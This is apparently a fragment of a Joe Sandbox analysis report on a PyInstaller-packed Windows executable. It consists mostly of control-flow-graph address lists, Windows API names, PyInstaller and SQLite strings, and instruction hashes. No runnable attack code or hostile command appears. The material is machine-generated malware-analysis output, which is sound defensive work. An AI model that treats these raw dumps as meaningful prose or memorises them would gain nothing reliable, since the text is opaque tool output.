7ff64487390e-7ff644873916 call 7ff644884f30 66->70 67->62 67->66 70->76 79 7ff644873a44-7ff644873a47 76->79 80 7ff644873b45-7ff644873b53 76->80 79->80 81 7ff644873a4d-7ff644873a50 79->81 82 7ff644873b59-7ff644873b5d 80->82 83 7ff644873a67 80->83 84 7ff644873a56-7ff644873a5a 81->84 85 7ff644873b14-7ff644873b17 81->85 86 7ff644873a6b-7ff644873a90 call 7ff644884f30 82->86 83->86 84->85 87 7ff644873a60 84->87 88 7ff644873b19-7ff644873b1d 85->88 89 7ff644873b2f-7ff644873b40 call 7ff644872710 85->89 95 7ff644873aab-7ff644873ac0 86->95 96 7ff644873a92-7ff644873aa6 call 7ff644878940 86->96 87->83 88->89 91 7ff644873b1f-7ff644873b2a 88->91 97 7ff644873c7f-7ff644873c87 89->97 91->86 99 7ff644873be8-7ff644873bfa call 7ff644878830 95->99 100 7ff644873ac6-7ff644873aca 95->100 96->95 97->40 108 7ff644873bfc-7ff644873c02 99->108 109 7ff644873c2e 99->109 102 7ff644873bcd-7ff644873be2 call 7ff644871940 100->102 103 7ff644873ad0-7ff644873ae8 call 7ff644885250 100->103 102->99 102->100 114 7ff644873aea-7ff644873b02 call 7ff644885250 103->114 115 7ff644873b62-7ff644873b7a call 7ff644885250 103->115 112 7ff644873c04-7ff644873c1c 108->112 113 7ff644873c1e-7ff644873c2c 108->113 111 7ff644873c31-7ff644873c40 call 7ff644884f30 109->111 123 7ff644873c46-7ff644873c4a 111->123 124 7ff644873d41-7ff644873d63 call 7ff6448744e0 111->124 112->111 113->111 114->102 122 7ff644873b08-7ff644873b0f 114->122 125 7ff644873b7c-7ff644873b80 115->125 126 7ff644873b87-7ff644873b9f call 7ff644885250 115->126 122->102 128 7ff644873cd4-7ff644873ce6 call 7ff644878830 123->128 129 7ff644873c50-7ff644873c5f call 7ff6448790e0 123->129 139 7ff644873d65-7ff644873d6f call 7ff644874630 124->139 140 7ff644873d71-7ff644873d82 call 7ff644871c80 124->140 125->126 135 7ff644873bac-7ff644873bc4 call 7ff644885250 126->135 136 7ff644873ba1-7ff644873ba5 126->136 144 7ff644873ce8-7ff644873ceb 128->144 145 7ff644873d35-7ff644873d3c 128->145 142 7ff644873cb3-7ff644873cbd call 7ff644878660 129->142 143 7ff644873c61 129->143 135->102 155 7ff644873bc6 135->155 136->135 153 7ff644873d87-7ff644873d96 139->153 140->153 162 7ff644873cc8-7ff644873ccf 142->162 163 7ff644873cbf-7ff644873cc6 142->163 150 7ff644873c68 call 7ff644872710 143->150 144->145 151 7ff644873ced-7ff644873d10 call 7ff644871c80 144->151 145->150 164 7ff644873c6d-7ff644873c77 150->164 168 7ff644873d2b-7ff644873d33 call 7ff644884f30 151->168 169 7ff644873d12-7ff644873d26 call 7ff644872710 call 7ff644884f30 151->169 158 7ff644873dbc-7ff644873dd2 call 7ff644879390 153->158 159 7ff644873d98-7ff644873d9f 153->159 155->102 171 7ff644873dd4 158->171 172 7ff644873de0-7ff644873dfc SetDllDirectoryW 158->172 159->158 160 7ff644873da1-7ff644873da5 159->160 160->158 166 7ff644873da7-7ff644873db6 LoadLibraryExW 160->166 162->153 163->150 164->97 166->158 168->153 169->164 171->172 175 7ff644873ef9-7ff644873f00 172->175 176 7ff644873e02-7ff644873e11 call 7ff644878830 172->176 179 7ff644873f06-7ff644873f0d 175->179 180 7ff644874000-7ff644874008 175->180 189 7ff644873e2a-7ff644873e34 call 7ff644884f30 176->189 190 7ff644873e13-7ff644873e19 176->190 179->180 183 7ff644873f13-7ff644873f1d call 7ff6448733c0 179->183 184 7ff64487402d-7ff644874038 call 7ff6448736a0 call 7ff644873360 180->184 185 7ff64487400a-7ff644874027 PostMessageW GetMessageW 180->185 183->164 197 7ff644873f23-7ff644873f37 call 7ff6448790c0 183->197 202 7ff64487403d-7ff64487405f call 7ff644873670 call 7ff644876fc0 call 7ff644876d70 184->202 185->184 199 7ff644873eea-7ff644873ef4 call 7ff644878940 189->199 200 7ff644873e3a-7ff644873e40 189->200 193 7ff644873e1b-7ff644873e23 190->193 194 7ff644873e25-7ff644873e27 190->194 193->194 194->189 209 7ff644873f5c-7ff644873f9f call 7ff644878940 call 7ff6448789e0 call 7ff644876fc0 call 7ff644876d70 call 7ff6448788e0 197->209 210 7ff644873f39-7ff644873f56 PostMessageW GetMessageW 197->210 199->175 200->199 204 7ff644873e46-7ff644873e4c 200->204 207 7ff644873e57-7ff644873e59 204->207 208 7ff644873e4e-7ff644873e50 204->208 207->175 213 7ff644873e5f-7ff644873e7b call 7ff644876dc0 call 7ff644877340 207->213 212 7ff644873e52 208->212 208->213 248 7ff644873fed-7ff644873ffb call 7ff644871900 209->248 249 7ff644873fa1-7ff644873fb7 call 7ff644878ed0 call 7ff6448788e0 209->249 210->209 212->175 228 7ff644873e7d-7ff644873e84 213->228 229 7ff644873e86-7ff644873e8d 213->229 231 7ff644873ed3-7ff644873ee8 call 7ff644872a50 call 7ff644876fc0 call 7ff644876d70 228->231 232 7ff644873ea7-7ff644873eb1 call 7ff6448771b0 229->232 233 7ff644873e8f-7ff644873e9c call 7ff644876e00 229->233 231->175 243 7ff644873ebc-7ff644873eca call 7ff6448774f0 232->243 244 7ff644873eb3-7ff644873eba 232->244 233->232 242 7ff644873e9e-7ff644873ea5 233->242 242->231 243->175 256 7ff644873ecc 243->256 244->231 248->164 249->248 261 7ff644873fb9-7ff644873fce 249->261 256->231 262 7ff644873fe8 call 7ff644872a50 261->262 263 7ff644873fd0-7ff644873fe3 call 7ff644872710 call 7ff644871900 261->263 262->248 263->164
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorFileLastModuleName
                                                                                                                                                                                                                                • String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to load splash screen resources!$Failed to remove temporary directory: %s$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s$MEI$PYINSTALLER_RESET_ENVIRONMENT$PYINSTALLER_STRICT_UNPACK_MODE$PYINSTALLER_SUPPRESS_SPLASH_SCREEN$Path exceeds PYI_PATH_MAX limit.$Py_GIL_DISABLED$VCRUNTIME140.dll$_PYI_APPLICATION_HOME_DIR$_PYI_APPLICATION_HOME_DIR not set for onefile child process!$_PYI_ARCHIVE_FILE$_PYI_PARENT_PROCESS_LEVEL$_PYI_SPLASH_IPC$bye-runtime-tmpdir$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-python-flag
                                                                                                                                                                                                                                • API String ID: 2776309574-3273434969
                                                                                                                                                                                                                                • Opcode ID: 4651f0dbc160d0404dcf25292df1705b0130bb44d3f559e05366d82f1582b67c
                                                                                                                                                                                                                                • Instruction ID: 0b21d57aca241b12cceed5b878a980193b2330edbd7d19641619f60746a22517
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4651f0dbc160d0404dcf25292df1705b0130bb44d3f559e05366d82f1582b67c
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BE328D22F0CA8299FA15FB2098E73B96651AF95780F844032DE5DC36DEEF2DE554C302

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 347 7ffdfaee9260-7ffdfaee92df 348 7ffdfaee92e5-7ffdfaee92ef 347->348 349 7ffdfaee943d-7ffdfaee9453 347->349 348->349 350 7ffdfaee92f5-7ffdfaee92f8 348->350 351 7ffdfaee9459-7ffdfaee945f 349->351 352 7ffdfaee934f-7ffdfaee9395 call 7ffdfaed6160 349->352 350->351 354 7ffdfaee92fe 350->354 351->352 355 7ffdfaee9465-7ffdfaee947b call 7ffdfaed6160 351->355 359 7ffdfaee939b-7ffdfaee93ff call 7ffdfb003acc 352->359 360 7ffdfaee9a2e-7ffdfaee9a31 352->360 357 7ffdfaee9305-7ffdfaee930e 354->357 364 7ffdfaee9a8e 355->364 367 7ffdfaee9481-7ffdfaee949c 355->367 357->357 361 7ffdfaee9310-7ffdfaee931f call 7ffdfaed6160 357->361 376 7ffdfaee9728-7ffdfaee9738 359->376 377 7ffdfaee9405-7ffdfaee9421 00007FFE148D2010 359->377 363 7ffdfaee9a33-7ffdfaee9a3a 360->363 360->364 361->364 378 7ffdfaee9325-7ffdfaee933b 00007FFE148D2010 361->378 369 7ffdfaee9a3c-7ffdfaee9a46 363->369 370 7ffdfaee9a85 363->370 368 7ffdfaee9a93-7ffdfaee9aaa 364->368 379 7ffdfaee94b6-7ffdfaee94bd 367->379 380 7ffdfaee949e-7ffdfaee94af 367->380 374 7ffdfaee9a48 369->374 375 7ffdfaee9a4e-7ffdfaee9a7b 369->375 370->364 374->375 375->364 407 7ffdfaee9a7d-7ffdfaee9a83 375->407 383 7ffdfaee967f-7ffdfaee96a4 376->383 381 7ffdfaee95db 377->381 382 7ffdfaee9427-7ffdfaee9438 00007FFE148D2010 377->382 384 7ffdfaee9340-7ffdfaee9347 378->384 389 7ffdfaee94c0-7ffdfaee94c7 379->389 380->379 388 7ffdfaee95de-7ffdfaee9627 00007FFE148D2010 * 2 381->388 382->388 385 7ffdfaee96aa-7ffdfaee96af 383->385 386 7ffdfaee97df 383->386 384->384 387 7ffdfaee9349 384->387 385->386 391 7ffdfaee96b5-7ffdfaee96e1 call 7ffdfaedff80 385->391 392 7ffdfaee97e4-7ffdfaee97f2 386->392 387->352 393 7ffdfaee9629-7ffdfaee9630 388->393 394 7ffdfaee967d 388->394 389->389 395 7ffdfaee94c9-7ffdfaee94d0 389->395 401 7ffdfaee96e4-7ffdfaee9704 391->401 396 7ffdfaee97f5-7ffdfaee97f8 392->396 397 7ffdfaee971a-7ffdfaee9723 393->397 398 7ffdfaee9636-7ffdfaee9640 393->398 394->383 399 7ffdfaee94d7-7ffdfaee94de 395->399 402 7ffdfaee98ab-7ffdfaee98b5 396->402 403 7ffdfaee97fe-7ffdfaee9819 call 7ffdfaee87e0 396->403 397->394 404 7ffdfaee9648-7ffdfaee9675 398->404 405 7ffdfaee9642 398->405 399->399 406 7ffdfaee94e0-7ffdfaee94f7 399->406 408 7ffdfaee97da-7ffdfaee97dd 401->408 409 7ffdfaee970a-7ffdfaee9714 401->409 414 7ffdfaee98b7-7ffdfaee98c0 402->414 415 7ffdfaee98c3-7ffdfaee98d6 call 7ffdfaee46a0 402->415 403->402 429 7ffdfaee981f-7ffdfaee98a3 403->429 404->394 450 7ffdfaee9677 404->450 405->404 411 7ffdfaee94f9 406->411 412 7ffdfaee9547-7ffdfaee954e 406->412 407->364 408->396 417 7ffdfaee9716-7ffdfaee9718 409->417 418 7ffdfaee973d-7ffdfaee9740 409->418 420 7ffdfaee9500-7ffdfaee9507 411->420 422 7ffdfaee9572-7ffdfaee9579 412->422 423 7ffdfaee9550-7ffdfaee9557 412->423 414->415 434 7ffdfaee98dc-7ffdfaee98e6 415->434 435 7ffdfaee9a20-7ffdfaee9a2c 415->435 428 7ffdfaee9742-7ffdfaee974a 417->428 418->428 430 7ffdfaee9510-7ffdfaee9519 420->430 426 7ffdfaee957b-7ffdfaee9585 422->426 427 7ffdfaee95ca 422->427 423->352 431 7ffdfaee955d-7ffdfaee956c call 7ffdfaf95c70 423->431 436 7ffdfaee9587 426->436 437 7ffdfaee958d-7ffdfaee95ba 426->437 443 7ffdfaee95d3-7ffdfaee95d6 427->443 441 7ffdfaee974c-7ffdfaee9760 call 7ffdfaee7bb0 428->441 442 7ffdfaee976e-7ffdfaee9784 call 7ffdfaf96c60 428->442 456 7ffdfaee9909-7ffdfaee990f 429->456 457 7ffdfaee98a5 429->457 430->430 438 7ffdfaee951b-7ffdfaee9529 430->438 431->352 431->422 446 7ffdfaee98e8 434->446 447 7ffdfaee98ee-7ffdfaee9901 434->447 435->368 436->437 437->443 471 7ffdfaee95bc-7ffdfaee95c5 437->471 449 7ffdfaee9530-7ffdfaee9539 438->449 441->442 459 7ffdfaee9762-7ffdfaee9767 441->459 460 7ffdfaee9786-7ffdfaee979b call 7ffdfaf4e090 442->460 461 7ffdfaee979d 442->461 443->368 446->447 447->456 449->449 458 7ffdfaee953b-7ffdfaee9545 449->458 450->394 463 7ffdfaee9938-7ffdfaee9948 456->463 464 7ffdfaee9911-7ffdfaee9934 456->464 457->402 458->412 458->420 459->442 466 7ffdfaee979f-7ffdfaee97a4 460->466 461->466 474 7ffdfaee994a 463->474 475 7ffdfaee9950-7ffdfaee9981 463->475 464->463 469 7ffdfaee97a6-7ffdfaee97bc call 7ffdfaf96c60 466->469 470 7ffdfaee97d2-7ffdfaee97d8 466->470 469->408 481 7ffdfaee97be-7ffdfaee97d0 call 7ffdfaf4e090 469->481 470->392 471->368 474->475 476 7ffdfaee9983-7ffdfaee9992 475->476 477 7ffdfaee9994-7ffdfaee999b 475->477 480 7ffdfaee999f-7ffdfaee99c1 call 7ffdfaee7bb0 476->480 477->480 486 7ffdfaee99c9-7ffdfaee99cc 480->486 487 7ffdfaee99c3-7ffdfaee99c7 480->487 481->408 481->470 489 7ffdfaee99d3 486->489 490 7ffdfaee99ce-7ffdfaee99d1 486->490 488 7ffdfaee99d7-7ffdfaee99e9 487->488 491 7ffdfaee99eb-7ffdfaee99f2 488->491 492 7ffdfaee99f4-7ffdfaee9a06 488->492 489->488 490->488 490->489 493 7ffdfaee9a0a-7ffdfaee9a1e 491->493 492->493 493->368
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.2196754681.00007FFDFAED1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFAED0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196705748.00007FFDFAED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196754681.00007FFDFB032000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196754681.00007FFDFB034000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196754681.00007FFDFB049000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2197064707.00007FFDFB04B000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2197118312.00007FFDFB04C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ffdfaed0000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: 00007D2010E148
                                                                                                                                                                                                                                • String ID: -journal$immutable$nolock
                                                                                                                                                                                                                                • API String ID: 1405196051-4201244970
                                                                                                                                                                                                                                • Opcode ID: 4bea203775868ea68d251f7b6ff5e7b65c0255cc7c9f1107d0df10a960319b88
                                                                                                                                                                                                                                • Instruction ID: 3d356916501f2b8accd3bec8a5a108379b278677c4f1e55851316293afb9a43e
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4bea203775868ea68d251f7b6ff5e7b65c0255cc7c9f1107d0df10a960319b88
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8432AD26B0978286EB28AF2594A4B7877A0FF45B94F094274CE7E477D8DF3DE8548300

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 615 7ff644896964-7ff6448969d7 call 7ff644896698 618 7ff6448969f1-7ff6448969fb call 7ff644888520 615->618 619 7ff6448969d9-7ff6448969e2 call 7ff644884ee8 615->619 624 7ff644896a16-7ff644896a7f CreateFileW 618->624 625 7ff6448969fd-7ff644896a14 call 7ff644884ee8 call 7ff644884f08 618->625 626 7ff6448969e5-7ff6448969ec call 7ff644884f08 619->626 628 7ff644896a81-7ff644896a87 624->628 629 7ff644896afc-7ff644896b07 GetFileType 624->629 625->626 642 7ff644896d32-7ff644896d52 626->642 632 7ff644896ac9-7ff644896af7 GetLastError call 7ff644884e7c 628->632 633 7ff644896a89-7ff644896a8d 628->633 635 7ff644896b09-7ff644896b44 GetLastError call 7ff644884e7c CloseHandle 629->635 636 7ff644896b5a-7ff644896b61 629->636 632->626 633->632 640 7ff644896a8f-7ff644896ac7 CreateFileW 633->640 635->626 649 7ff644896b4a-7ff644896b55 call 7ff644884f08 635->649 638 7ff644896b63-7ff644896b67 636->638 639 7ff644896b69-7ff644896b6c 636->639 646 7ff644896b72-7ff644896bc7 call 7ff644888438 638->646 639->646 647 7ff644896b6e 639->647 640->629 640->632 654 7ff644896be6-7ff644896c17 call 7ff644896418 646->654 655 7ff644896bc9-7ff644896bd5 call 7ff6448968a0 646->655 647->646 649->626 660 7ff644896c19-7ff644896c1b 654->660 661 7ff644896c1d-7ff644896c5f 654->661 655->654 662 7ff644896bd7 655->662 663 7ff644896bd9-7ff644896be1 call 7ff64488aac0 660->663 664 7ff644896c81-7ff644896c8c 661->664 665 7ff644896c61-7ff644896c65 661->665 662->663 663->642 668 7ff644896d30 664->668 669 7ff644896c92-7ff644896c96 664->669 665->664 667 7ff644896c67-7ff644896c7c 665->667 667->664 668->642 669->668 671 7ff644896c9c-7ff644896ce1 CloseHandle CreateFileW 669->671 672 7ff644896ce3-7ff644896d11 GetLastError call 7ff644884e7c call 7ff644888660 671->672 673 7ff644896d16-7ff644896d2b 671->673 672->673 673->668
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1617910340-0
                                                                                                                                                                                                                                • Opcode ID: baaa1bd2bfcf3e8d87424e6061cd652f961a4b3dae6ad7eaae94581ee29caa63
                                                                                                                                                                                                                                • Instruction ID: dd2a26a26d53b17f2a3778c7fc028f4f761f290a0883d563173c3e4702731931
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: baaa1bd2bfcf3e8d87424e6061cd652f961a4b3dae6ad7eaae94581ee29caa63
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 86C1B137B28E4689EB10EF65C4926AC3761F789BA8F015239DE1EA7798DF39D451C300
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.2198385176.00007FFDFB705000.00000080.00000001.01000000.00000004.sdmp, Offset: 00007FFDFB050000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2197166617.00007FFDFB050000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2197225283.00007FFDFB051000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2197225283.00007FFDFB2F2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2197225283.00007FFDFB301000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2197225283.00007FFDFB377000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2197225283.00007FFDFB442000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2197225283.00007FFDFB543000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2197225283.00007FFDFB546000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2197225283.00007FFDFB641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2197225283.00007FFDFB64B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2197225283.00007FFDFB6C3000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2197225283.00007FFDFB6F8000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2198442898.00007FFDFB707000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ffdfb050000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ProtectVirtual$AddressLibraryLoadProc
                                                                                                                                                                                                                                • String ID: g2k
                                                                                                                                                                                                                                • API String ID: 3300690313-2244601878
                                                                                                                                                                                                                                • Opcode ID: a115f6f30bbd8d02d58b82d4edccd5ff49c332ccac270e82277def0562ac2ca0
                                                                                                                                                                                                                                • Instruction ID: f85b281f9f6a6f4723201e2cdb804ed6f6054104a8373fbaf58998d52eb348d1
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a115f6f30bbd8d02d58b82d4edccd5ff49c332ccac270e82277def0562ac2ca0
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BE62282271929286E7158F38D96467E76A0F7547C5F085132EAEEC37E8EB3CEA45C700

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 1895 7ffdfaf54d90-7ffdfaf54e61 call 7ffdfb003acc 1898 7ffdfaf54e63-7ffdfaf54e76 1895->1898 1899 7ffdfaf54e79-7ffdfaf54e7d 1895->1899 1898->1899 1900 7ffdfaf54e9d-7ffdfaf54ea3 1899->1900 1901 7ffdfaf54e7f-7ffdfaf54e98 call 7ffdfaeda490 1899->1901 1903 7ffdfaf54ea5-7ffdfaf54eaf 1900->1903 1904 7ffdfaf54eb6-7ffdfaf54ebe 1900->1904 1908 7ffdfaf5530c-7ffdfaf5533a call 7ffdfaf54ae0 call 7ffdfb002bc0 1901->1908 1903->1904 1906 7ffdfaf54fa1-7ffdfaf54fa9 1904->1906 1907 7ffdfaf54ec4-7ffdfaf54eca 1904->1907 1909 7ffdfaf54fb3-7ffdfaf54fb6 1906->1909 1910 7ffdfaf54fab-7ffdfaf54fae call 7ffdfaf6e7c0 1906->1910 1911 7ffdfaf54ed0-7ffdfaf54ed7 1907->1911 1912 7ffdfaf54f9c 1907->1912 1915 7ffdfaf5505b-7ffdfaf55063 call 7ffdfaf8fe10 1909->1915 1916 7ffdfaf54fbc 1909->1916 1910->1909 1917 7ffdfaf54ee0-7ffdfaf54eec 1911->1917 1912->1906 1929 7ffdfaf55068-7ffdfaf5506b 1915->1929 1919 7ffdfaf54fbe-7ffdfaf54fc4 1916->1919 1920 7ffdfaf54fca-7ffdfaf54fd1 1916->1920 1921 7ffdfaf54f5e-7ffdfaf54f69 1917->1921 1922 7ffdfaf54eee-7ffdfaf54ef2 1917->1922 1919->1915 1919->1920 1925 7ffdfaf54fd3-7ffdfaf54ff6 call 7ffdfaeda300 call 7ffdfaed6d00 1920->1925 1926 7ffdfaf54ffb-7ffdfaf54ffe 1920->1926 1930 7ffdfaf54f6b-7ffdfaf54f6d 1921->1930 1931 7ffdfaf54f97 1921->1931 1927 7ffdfaf54ef4-7ffdfaf54efb 1922->1927 1928 7ffdfaf54f07-7ffdfaf54f0f 1922->1928 1925->1908 1933 7ffdfaf5504e-7ffdfaf55059 1926->1933 1934 7ffdfaf55000-7ffdfaf55012 call 7ffdfaed6860 1926->1934 1927->1928 1937 7ffdfaf54efd-7ffdfaf54f05 call 7ffdfaeefe80 1927->1937 1928->1921 1932 7ffdfaf54f11-7ffdfaf54f18 1928->1932 1938 7ffdfaf5506d-7ffdfaf55074 1929->1938 1939 7ffdfaf55077-7ffdfaf55083 1929->1939 1930->1917 1931->1912 1940 7ffdfaf54f1a-7ffdfaf54f1e 1932->1940 1941 7ffdfaf54f27-7ffdfaf54f2e 1932->1941 1933->1929 1934->1933 1959 7ffdfaf55014-7ffdfaf5504c 00007FFE148D2010 call 7ffdfaf8fe10 call 7ffdfaed63e0 1934->1959 1937->1928 1938->1939 1945 7ffdfaf55085-7ffdfaf55091 1939->1945 1946 7ffdfaf550e8-7ffdfaf550ec 1939->1946 1940->1941 1948 7ffdfaf54f20-7ffdfaf54f25 1940->1948 1950 7ffdfaf54f30-7ffdfaf54f33 1941->1950 1951 7ffdfaf54f4a 1941->1951 1945->1946 1947 7ffdfaf55093-7ffdfaf5509d 1945->1947 1952 7ffdfaf55101-7ffdfaf55107 1946->1952 1953 7ffdfaf550ee-7ffdfaf550fc 1946->1953 1956 7ffdfaf5509f 1947->1956 1957 7ffdfaf550a9-7ffdfaf550af 1947->1957 1958 7ffdfaf54f4c-7ffdfaf54f50 1948->1958 1960 7ffdfaf54f41-7ffdfaf54f48 1950->1960 1961 7ffdfaf54f35-7ffdfaf54f39 1950->1961 1951->1958 1963 7ffdfaf552a4-7ffdfaf552c2 1952->1963 1964 7ffdfaf5510d-7ffdfaf55110 1952->1964 1962 7ffdfaf55238-7ffdfaf5523b 1953->1962 1956->1957 1966 7ffdfaf550b1-7ffdfaf550c3 call 7ffdfaed6860 1957->1966 1967 7ffdfaf550da 1957->1967 1970 7ffdfaf54f52-7ffdfaf54f55 call 7ffdfaeefe50 1958->1970 1971 7ffdfaf54f5a-7ffdfaf54f5c 1958->1971 1959->1929 1960->1950 1960->1951 1961->1960 1969 7ffdfaf54f3b-7ffdfaf54f3f 1961->1969 1972 7ffdfaf5523d-7ffdfaf55240 call 7ffdfaf059f0 1962->1972 1973 7ffdfaf55245-7ffdfaf55251 1962->1973 1974 7ffdfaf552c4-7ffdfaf552cd 1963->1974 1975 7ffdfaf552df-7ffdfaf552e6 1963->1975 1964->1963 1976 7ffdfaf55116-7ffdfaf5511b 1964->1976 1982 7ffdfaf550dc-7ffdfaf550e3 1966->1982 2003 7ffdfaf550c5-7ffdfaf550d8 00007FFE148D2010 1966->2003 1967->1982 1969->1948 1969->1960 1970->1971 1971->1921 1984 7ffdfaf54f72-7ffdfaf54f92 call 7ffdfaeda300 1971->1984 1972->1973 1977 7ffdfaf55253-7ffdfaf5526c call 7ffdfaeda300 1973->1977 1978 7ffdfaf55278-7ffdfaf55281 1973->1978 1986 7ffdfaf552cf-7ffdfaf552d7 call 7ffdfaf005f0 1974->1986 1987 7ffdfaf552d9 1974->1987 1975->1908 1979 7ffdfaf552e8 1975->1979 1976->1962 1988 7ffdfaf55121-7ffdfaf55128 1976->1988 1977->1975 2008 7ffdfaf5526e-7ffdfaf55276 call 7ffdfaed63e0 1977->2008 1993 7ffdfaf55283-7ffdfaf5528b 1978->1993 1994 7ffdfaf55296-7ffdfaf552a2 call 7ffdfaeda1e0 1978->1994 1991 7ffdfaf552f0-7ffdfaf5530a call 7ffdfaed63e0 1979->1991 1982->1946 1984->1908 1986->1975 1987->1975 1988->1962 1997 7ffdfaf5512e-7ffdfaf5513a 1988->1997 1991->1908 1993->1994 2004 7ffdfaf5528d-7ffdfaf55294 1993->2004 1994->1975 1997->1962 1999 7ffdfaf55140-7ffdfaf5514d 1997->1999 2007 7ffdfaf55150-7ffdfaf55164 1999->2007 